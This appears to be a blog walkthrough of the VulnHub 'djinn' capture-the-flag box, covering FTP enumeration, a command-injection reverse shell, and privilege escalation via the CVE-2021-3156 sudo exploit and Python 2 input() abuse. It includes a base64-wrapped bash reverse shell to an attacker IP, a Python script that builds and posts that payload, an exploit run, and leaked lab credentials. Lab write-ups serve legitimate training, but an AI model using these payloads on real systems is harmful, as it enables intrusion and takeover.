vulnhub-wp djinn

🖳 host discovery

sudo netdiscover -r 192.168.165.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                          

5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.165.14 c6:3b:70:2b:33:1e 3 180 Unknown vendor
192.168.165.109 08:00:27:43:80:7b 1 60 PCS Systemtechnik GmbH
192.168.165.196 20:1e:88:ad:fc:55 1 60 Intel Corporate

The target is 192.168.165.109 (the PCS Systemtechnik GmbH MAC prefix is VirtualBox's, which is what VulnHub boxes usually run in).

👁 service scan

nmap scan

sudo nmap -p- -sV -sC -Pn -oN nmap --min-rate 8000 192.168.165.109
···
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.165.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '-', 8)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '-', 1)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-title: Lost in space
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
···

🚪🚶 get shell

Port 21 allows anonymous login, and we grab creds.txt, game.txt and message.txt:

cat message.txt          
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.

cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.

cat creds.txt
nitu:81299

Connecting to 1337 with nc, we find it is a game:

nc 192.168.165.109 1337 
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|


Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(9, '*', 8)
> 72
(4, '-', 8)
> -4
(1, '*', 7)
> 7
(3, '/', 9)
> 1/3
(4, '*', 4)
> 16
(7, '*', 4)
> 28
(9, '-', 1)
> 8
(7, '-', 8)
> -1
(9, '/', 3)
> 3
(4, '-', 1)
> exit
Stop acting like a hacker for a damn minute!!
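Answering 1000 rounds by hand is not realistic, but the prompt format is regular enough to script. The solver below is an added example and not part of the original writeup: it parses each `(a, 'op', b)` line with `ast.literal_eval` (so text coming from the server is never passed to `eval`), sends the answer, and returns whatever the server prints after the last round. How the game wants division answered is not shown on this page (the author typed `1/3` for `(3, '/', 9)` and got no verdict), so the exact-fraction form used here is an assumption. The sample prompts in the block are constructed from the session above.

```python
import ast
import operator
import socket
from fractions import Fraction

# Constructed sample prompts in the format the port-1337 game prints
# (the nc session above shows the real thing).
SAMPLE_PROMPTS = ["(9, '*', 8)", "> (4, '-', 8)", "(3, '/', 9)"]

OPS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    # ASSUMPTION: the page shows the author answering 1/3 for (3, '/', 9) but
    # not what the server accepts, so division keeps the exact rational.
    "/": lambda a, b: Fraction(a, b),
}


def parse_prompt(line):
    """Turn "(9, '*', 8)" (optionally behind the "> " prompt) into a tuple.
    ast.literal_eval only accepts literals, so server text is never eval()ed."""
    text = line.strip().lstrip(">").strip()
    value = ast.literal_eval(text)
    if not (isinstance(value, tuple) and len(value) == 3):
        raise ValueError("not a question: %r" % line)
    a, op, b = value
    if op not in OPS or not isinstance(a, int) or not isinstance(b, int):
        raise ValueError("not a question: %r" % line)
    return a, op, b


def is_prompt(line):
    """True for a question line, False for banner/blank/final-message lines."""
    try:
        parse_prompt(line)
        return True
    except (ValueError, SyntaxError):
        return False


def answer(line):
    """Compute the reply for one question line."""
    a, op, b = parse_prompt(line)
    result = OPS[op](a, b)
    if isinstance(result, Fraction):
        if result.denominator == 1:
            return str(result.numerator)
        return "%d/%d" % (result.numerator, result.denominator)
    return str(result)


def play(host, port=1337, rounds=1000, timeout=10.0):
    """Drive the game over TCP and return what the server says after the last
    round. Network code: it only does anything against the real box."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rwb", buffering=0)
        answered, tail = 0, b""
        while answered < rounds:
            line = f.readline()
            if not line:
                break  # server hung up early (e.g. after a wrong answer)
            text = line.decode(errors="replace")
            if is_prompt(text):
                f.write((answer(text) + "\n").encode())
                answered += 1
            else:
                tail += line  # banner, blank line or the final message
        try:
            tail += f.read()  # everything after the last answer, until EOF
        except OSError:
            pass
        return tail.decode(errors="replace")


if __name__ == "__main__":
    for p in SAMPLE_PROMPTS:
        print(p, "->", answer(p))
```

The server sends `> ` as a prompt with no newline, so the next line read looks like `> (4, '-', 8)`; `parse_prompt` strips that marker before parsing. If the game rejects a division answer, change only the `/` entry in `OPS` (for example to integer division) and rerun `play`.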

Playing 1000 rounds by hand is not an option, so we look at the other port first.
Brute-forcing paths on the port 7331 web app turns up /wish and /genie.
/wish has a command-execution bug, so let's try it.

echo 'bash -i >& /dev/tcp/192.168.165.130/443 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NS4xMzAvNDQzIDA+JjEK

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NS4xMzAvNDQzIDA+JjEK | base64 -d | bash
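Why the base64 wrapper: what reaches /wish is only `echo`, a base64-alphabet string and `| base64 -d | bash`, so the quotes, `&`, `>` and `/` in the reverse shell never touch the form or whatever filtering sits behind it, and the string survives URL encoding untouched. The helper below is an added example, not the writeup's or the box's code: it builds the exact payload above, checks that it decodes back to the one-liner, and POSTs it. The form field name `wish` and the POST method are assumptions; read both off the HTML of /wish before using `send_wish`, and start the listener (`nc -lvnp 443` on 192.168.165.130) first.

```python
import base64
import urllib.parse
import urllib.request

# Our listener, as in the writeup (nc -lvnp 443 on the attacker box).
LHOST, LPORT = "192.168.165.130", 443

PREFIX, SUFFIX = "echo ", " | base64 -d | bash"


def reverse_shell_cmd(lhost=LHOST, lport=LPORT):
    """The bash reverse shell one-liner used above."""
    return "bash -i >& /dev/tcp/%s/%d 0>&1" % (lhost, lport)


def wrap_base64(cmd):
    """Build `echo <b64> | base64 -d | bash`. echo adds a trailing newline, so the
    encoded text includes one; this reproduces the writeup's string exactly."""
    b64 = base64.b64encode((cmd + "\n").encode()).decode()
    return PREFIX + b64 + SUFFIX


def unwrap_base64(wrapped):
    """Inverse of wrap_base64: decode the payload to check it before sending."""
    if not (wrapped.startswith(PREFIX) and wrapped.endswith(SUFFIX)):
        raise ValueError("not a wrapped payload")
    inner = wrapped[len(PREFIX):-len(SUFFIX)]
    return base64.b64decode(inner).decode().rstrip("\n")


def send_wish(base_url, payload, field="wish", timeout=10):
    """POST the payload to /wish. ASSUMPTION: the field name and the method;
    confirm both from the form on /wish. Returns (status, body)."""
    data = urllib.parse.urlencode({field: payload}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/wish",
                                 data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    payload = wrap_base64(reverse_shell_cmd())
    assert unwrap_base64(payload) == reverse_shell_cmd()
    print(payload)
    # send_wish("http://192.168.165.109:7331", payload)  # once the listener is up
```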

Once the shell calls back, we enumerate and find nitish's credentials in a hidden directory:

www-data@djinn:/home/nitish$ ls -la
ls -la
total 32
drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 130 Nov 12 2019 .bash_history
-rw-r--r-- 1 nitish nitish 3771 Nov 11 2019 .bashrc
drwx------ 2 nitish nitish 4096 Nov 11 2019 .cache
drwxr-xr-x 2 nitish nitish 4096 Oct 21 2019 .dev
drwx------ 3 nitish nitish 4096 Nov 11 2019 .gnupg
-rw-r----- 1 nitish nitish 33 Nov 12 2019 user.txt
www-data@djinn:/home/nitish$ ls -la .dev
ls -la .dev
total 12
drwxr-xr-x 2 nitish nitish 4096 Oct 21 2019 .
drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 ..
-rw-r--r-- 1 nitish nitish 24 Oct 21 2019 creds.txt
www-data@djinn:/home/nitish$ cat .dev/creds.txt
cat .dev/creds.txt
nitish:p4ssw0rdStr3r0n9
www-data@djinn:/home/nitish$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:~$ whoami
whoami
nitish
nitish@djinn:~$ ls -la
ls -la
total 32
drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 130 Nov 12 2019 .bash_history
-rw-r--r-- 1 nitish nitish 3771 Nov 11 2019 .bashrc
drwx------ 2 nitish nitish 4096 Nov 11 2019 .cache
drwxr-xr-x 2 nitish nitish 4096 Oct 21 2019 .dev
drwx------ 3 nitish nitish 4096 Nov 11 2019 .gnupg
-rw-r----- 1 nitish nitish 33 Nov 12 2019 user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$

So we have user.txt.

🛡️ PE

sudo exploit PE (unintended route)

A note on practice: when the box designer's intended privilege escalation is not a kernel bug, lean on kernel (and other generic, version-based) exploits as little as possible.
Still, after checking the OS and sudo versions, the box looks exploitable that way:

nitish@djinn:/opt/80/templates$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.3 LTS
Release: 18.04
Codename: bionic
···
nitish@djinn:/opt/80/templates$ sudo -V
sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
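Before running a heap exploit against sudo it is worth confirming the bug is actually there: the upstream version string alone does not tell you whether the distribution backported the fix (Ubuntu shipped a patched 1.8.21p2 package for 18.04). The check below is an added example, not the writeup's or the exploit repo's code. It compares the `sudo -V` version against the affected ranges from the CVE-2021-3156 advisory (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1) and then applies the Qualys probe: an unprivileged `sudoedit -s /` answers `sudoedit: /: not a regular file` on vulnerable builds and `usage: ...` on patched ones, with no password and no exploitation involved. The sample outputs in the test are constructed.

```python
import re
import subprocess

# Upstream ranges named in the CVE-2021-3156 advisory: legacy 1.8.2 - 1.8.31p2
# and stable 1.9.0 - 1.9.5p1. Versions are compared as (major, minor, patch, p).
AFFECTED_RANGES = [((1, 8, 2, 0), (1, 8, 31, 2)), ((1, 9, 0, 0), (1, 9, 5, 1))]


def parse_sudo_version(sudo_v_output):
    """Pull the version tuple out of `sudo -V` text, e.g. 'Sudo version 1.8.21p2'."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", sudo_v_output)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def in_affected_range(version):
    """True if the *upstream* version sits in an affected range. A distro may
    have backported the fix without bumping this number (Ubuntu did), so True
    only means 'worth probing', never 'exploitable'."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def classify_sudoedit_output(text):
    """Qualys' probe: `sudoedit -s /` reports 'sudoedit: /: not a regular file'
    on vulnerable builds and 'usage: ...' on patched ones."""
    first = text.strip().splitlines()[0] if text.strip() else ""
    if first.startswith("sudoedit:"):
        return "likely vulnerable"
    if first.startswith("usage:"):
        return "patched"
    return "unknown"


def probe_sudoedit(timeout=5):
    """Run the probe as the current user. It needs no password and exploits
    nothing; it only exercises the argument parsing the bug lives in."""
    try:
        p = subprocess.run(["sudoedit", "-s", "/"], stdin=subprocess.DEVNULL,
                           capture_output=True, text=True, timeout=timeout)
    except FileNotFoundError:
        return "sudoedit not found"
    except subprocess.TimeoutExpired:
        return "unknown"
    return classify_sudoedit_output(p.stderr + p.stdout)


if __name__ == "__main__":
    out = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
    v = parse_sudo_version(out)
    print("sudo %d.%d.%dp%d upstream-affected: %s" % (v + (in_affected_range(v),)))
    print("sudoedit probe:", probe_sudoedit())
```

On this box both signals agree; on a patched 18.04 the version check would still say "affected" while the probe says "patched", which is exactly why the probe is the one to trust.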

So we can use this exploit for CVE-2021-3156 (Baron Samedit, the heap overflow in sudo's argument handling): https://github.com/worawit/CVE-2021-3156

nitish@djinn:~$ python3 exploit_sudo.py
python3 exploit_sudo.py
# whoami
whoami
root
# cd /root
# ./proof.sh
./proof.sh
TERM environment variable not set.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Fri Mar 15 10:31:12 IST 2024
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

intended PE

There is a binary nitish can run through sudo (sudo -l lists it); its man page documents the options.


After a lot of trial and error, its -cmd option gives us a shell as sam.

sam has sudo rights too.

After trying those, nothing obvious comes of it, so we keep enumerating.

We find a .pyc file in sam's home; let's decompile it.
First we need to get it off the machine: either copy it into the web root, or start a quick Python web server in its directory and fetch it from the attacker box:

python -m SimpleHTTPServer    # the box runs Python 2; on Python 3 use: python3 -m http.server

and decompile it with uncompyle6:

uncompyle6 .pyc
# uncompyle6 version 3.9.0
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Aug 1 2022, 06:23:55)
# [GCC 12.1.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 21:05:18
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '

def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'

def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)

def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice

def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())
# okay decompiling Untitled.pyc

From other walkthroughs, the bug is Python 2's input(): it is eval(raw_input()), so whatever we type at "Enter your number:" is evaluated as a Python expression in guessit()'s own frame. Typing the name num makes s == num true every time and spawns the shell; if the script runs under sudo, that shell is root.
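To make the mechanism concrete without Python 2 on hand, the block below is an added example (not the box's script and not from any walkthrough): it emulates Python 2's input() by eval()ing the typed line with the caller's globals and locals, reproduces guessit() from the decompiled exp.py with the system('/bin/sh') replaced by a return value, and sets a fixed version beside it that parses the input as an integer. The answers fed in (`num`, and an expression that runs arbitrary code and still compares equal) are constructed.

```python
import random
import sys


def py2_input(prompt, line):
    """Emulate Python 2's input(): eval() the typed text using the globals and
    locals of the calling frame, so a bare name like `num` resolves to the
    caller's local variable. `line` stands in for what the user would type."""
    caller = sys._getframe(1)
    return eval(line, caller.f_globals, dict(caller.f_locals))


def guessit_vulnerable(line):
    """Mirror of guessit() from the decompiled exp.py. Where the original calls
    system('/bin/sh') we return True; False stands for 'Better Luck next time'."""
    num = random.randint(1, 101)
    s = py2_input("Enter your number: ", line)
    return s == num


def guessit_fixed(line):
    """Same game with the answer parsed as an integer, which is what Python 3's
    input() plus int() gives you; no expression is ever evaluated."""
    num = random.randint(1, 101)
    try:
        s = int(line.strip())
    except ValueError:
        return False
    return s == num


if __name__ == "__main__":
    # The player never needs to know the number: `num` evaluates to it.
    print("vulnerable, answer 'num':", guessit_vulnerable("num"))
    # eval() also runs arbitrary code; `and num` keeps the comparison true.
    print("vulnerable, answer with side effect:",
          guessit_vulnerable("__import__('os').getpid() and num"))
    print("fixed, answer 'num':", guessit_fixed("num"))
```

Because input() evaluates in guessit()'s frame, the attacker does not even need the number-guess path: `__import__('os').system('/bin/sh')` at the same prompt spawns the shell directly. The fix is to never let untrusted text reach eval, i.e. raw_input() plus int() on Python 2, or plain input() on Python 3.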

Let's get root.

📖 recommend article

walkthrough by Raj Chandel (Python 2 input() PE)
another walkthrough (a different PE route!)
download djinn


Source: https://rightevil.github.io/vulnhub-wp-djinn/
Author: rightevil
Published: 15 March 2024